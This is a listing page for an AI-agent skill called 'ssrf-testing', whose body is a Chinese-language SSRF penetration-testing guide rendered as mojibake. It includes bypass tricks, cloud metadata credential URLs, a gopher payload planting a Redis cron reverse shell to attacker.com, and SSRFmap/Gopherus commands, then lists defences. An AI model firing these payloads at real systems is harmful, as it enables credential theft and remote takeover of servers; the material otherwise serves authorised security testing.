ssrf-testing
13
总安装量
12
周安装量
#24524
全站排名
安装命令
npx skills add https://github.com/ed1s0nz/cyberstrikeai --skill ssrf-testing
Agent 安装分布
codex
11
opencode
8
gemini-cli
7
antigravity
7
codebuddy
7
claude-code
7
Skill 文档
SSRFæå¡å¨ç«¯è¯·æ±ä¼ªé æµè¯
æ¦è¿°
SSRFï¼Server-Side Request Forgeryï¼æ¯ä¸ç§å©ç¨æå¡å¨å起请æ±çæ¼æ´ï¼å¯ä»¥è®¿é®å ç½èµæºãè¿è¡ç«¯å£æ«ææç»è¿é²ç«å¢ãæ¬æè½æä¾SSRFæ¼æ´çæ£æµãå©ç¨åé²æ¤æ¹æ³ã
æ¼æ´åç
åºç¨ç¨åºæ¥åURLåæ°å¹¶è¯·æ±è¯¥URLï¼æ»å»è å¯ä»¥æ§å¶è¯·æ±çç®æ ï¼å¯¼è´ï¼
- å ç½èµæºè®¿é®
- æ¬å°æ件读å
- 端å£æ«æ
- ç»è¿é²ç«å¢
- äºæå¡å æ°æ®è®¿é®
æµè¯æ¹æ³
1. è¯å«SSRFè¾å ¥ç¹
常è§åè½ï¼
- URLé¢è§/æªå¾
- æ件ä¸ä¼ ï¼è¿ç¨URLï¼
- Webhookåè°
- API代ç
- æ°æ®å¯¼å ¥
- å¾çå¤ç
- PDFçæ
2. åºç¡æ£æµ
æµè¯æ¬å°åç¯ï¼
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]
æµè¯å ç½IPï¼
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
æµè¯æ件åè®®ï¼
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
3. ç»è¿ææ¯
IPå°åç¼ç ï¼
127.0.0.1 â 2130706433 (åè¿å¶)
127.0.0.1 â 0x7f000001 (åå
è¿å¶)
127.0.0.1 â 0177.0.0.1 (å
«è¿å¶)
åå解æç»è¿ï¼
127.0.0.1.xip.io
127.0.0.1.nip.io
localtest.me
URLéå®åï¼
http://attacker.com/redirect â http://127.0.0.1
å议混æ·ï¼
http://127.0.0.1:80@evil.com
http://evil.com#@127.0.0.1
å©ç¨ææ¯
å ç½æ¢æµ
端å£æ«æï¼
# 使ç¨Burp Intruder
http://127.0.0.1:22
http://127.0.0.1:3306
http://127.0.0.1:6379
http://127.0.0.1:8080
http://127.0.0.1:9200
è¯å«æå¡ï¼
- ååºæ¶é´å·®å¼
- é误信æ¯
- HTTPç¶æç
- ååºå 容
äºæå¡å æ°æ®
AWS EC2ï¼
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
Google Cloudï¼
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
Azureï¼
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01
é¿éäºï¼
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/ram/security-credentials/
å ç½åºç¨æ»å»
访é®ç®¡çåå°ï¼
http://127.0.0.1:8080/admin
http://192.168.1.100/phpmyadmin
Redisæªææ访é®ï¼
http://127.0.0.1:6379
# ç¶ååéRediså½ä»¤
FastCGIæ»å»ï¼
http://127.0.0.1:9000
# å©ç¨FastCGIåè®®æ§è¡å½ä»¤
é«çº§å©ç¨
Gopheråè®®
åéä»»æåè®®æ°æ®ï¼
gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aquit%0d%0a
Rediså½ä»¤æ§è¡ï¼
gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
Dictåè®®
端å£æ«æåä¿¡æ¯æ¶éï¼
dict://127.0.0.1:6379/info
dict://127.0.0.1:3306/status
æ件åè®®
读åæ¬å°æ件ï¼
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
file:///proc/self/environ
å·¥å ·ä½¿ç¨
SSRFmap
# åºç¡æ«æ
python3 ssrfmap.py -r request.txt -p url
# 端å£æ«æ
python3 ssrfmap.py -r request.txt -p url -m portscan
# äºå
æ°æ®
python3 ssrfmap.py -r request.txt -p url -m cloud
Gopherus
# çæGopher payload
python gopherus.py --exploit redis
Burp Collaborator
æ£æµç²SSRFï¼
http://burpcollaborator.net
# è§å¯æ¯å¦æDNS/HTTP请æ±
éªè¯åæ¥å
éªè¯æ¥éª¤
- 确认å¯ä»¥æ§å¶è¯·æ±ç®æ
- éªè¯å ç½èµæºè®¿é®æ端å£æ«æ
- è¯ä¼°å½±åèå´ï¼å ç½æ¸éãæ°æ®æ³é²çï¼
- è®°å½å®æ´çPOC
æ¥åè¦ç¹
- æ¼æ´ä½ç½®åè¾å ¥åæ°
- å¯è®¿é®çå ç½èµæºæ端å£
- å®æ´çå©ç¨æ¥éª¤åPoC
- ä¿®å¤å»ºè®®ï¼URLç½ååãç¦ç¨å±é©åè®®çï¼
é²æ¤æªæ½
æ¨èæ¹æ¡
-
URLç½åå
ALLOWED_DOMAINS = ['example.com', 'cdn.example.com'] parsed = urlparse(url) if parsed.netloc not in ALLOWED_DOMAINS: raise ValueError("Domain not allowed") -
ç¦ç¨å±é©åè®®
- åªå 许http/https
- ç¦æ¢file://ãgopher://ãdict://ç
-
IPå°åè¿æ»¤
import ipaddress def is_internal_ip(ip): return ipaddress.ip_address(ip).is_private or \ ipaddress.ip_address(ip).is_loopback -
使ç¨DNS解æéªè¯
- 解æååè·åIP
- éªè¯IPæ¯å¦å¨å ç½èå´
-
ç½ç»é离
- éå¶æå¡å¨åºç½æé
- 使ç¨ä»£çæå¡å¨
注æäºé¡¹
- ä» å¨æææµè¯ç¯å¢ä¸è¿è¡
- é¿å 对å ç½ç³»ç»é æå½±å
- 注æä¸ååè®®çæ¯ææ åµ
- æµè¯æ¶æ³¨æ请æ±é¢çï¼é¿å 触åé²æ¤